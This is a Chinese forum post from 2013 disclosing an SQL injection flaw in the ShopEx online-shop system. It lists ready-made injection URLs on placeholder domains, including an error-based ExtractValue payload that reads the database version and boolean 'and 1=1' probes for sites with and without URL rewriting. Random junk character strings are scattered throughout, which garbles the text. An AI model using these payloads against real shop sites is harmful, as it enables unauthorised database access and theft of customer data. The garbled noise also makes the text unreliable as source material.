注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
' z1 R7 ^' q: F
$ r5 d! W. c% D1 o( _3 r好吧,我扯远了~~$ k* @6 t+ E2 _0 T# M
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
# U* o7 B6 J+ v) W" T4 [2 F/ n不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
- ]' F: t6 O, I, ]; S- E8 w) w6 T3 O! p7 C6 s' A& }
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
8 k; }( [# T* J
3 z% J1 r, }+ B9 H' L/ ihttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 4 L& \( E7 V9 ]1 ?! j& {
4 A j. X! }5 b4 `2 M+ y
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
) h+ q. o% K8 s9 A& P! O9 [ U) Z0 [0 o4 q1 W0 g8 {/ ~5 z, {! @: D
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
$ ?- _* m- F* D
0 o5 i" y8 p$ i% ~5 X1 d + W) r' c5 C- U- s. C6 q
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
" ]2 d" y% @; W; R9 G# @$ m8 ?如何注入就不多说了,10多年的东西了…不会也会了…
0 \5 |2 I4 b# P+ f8 ]9 P: Y# o6 `$ G2 |; W! u [8 F
4 [, R1 L ]( L* U- a
5 n1 M/ l. p0 E1 _2 X# N' Y3 k @3 |7 C3 y& _6 Q
|
发表于 2013-2-19 08:31:27
收藏
支持
反对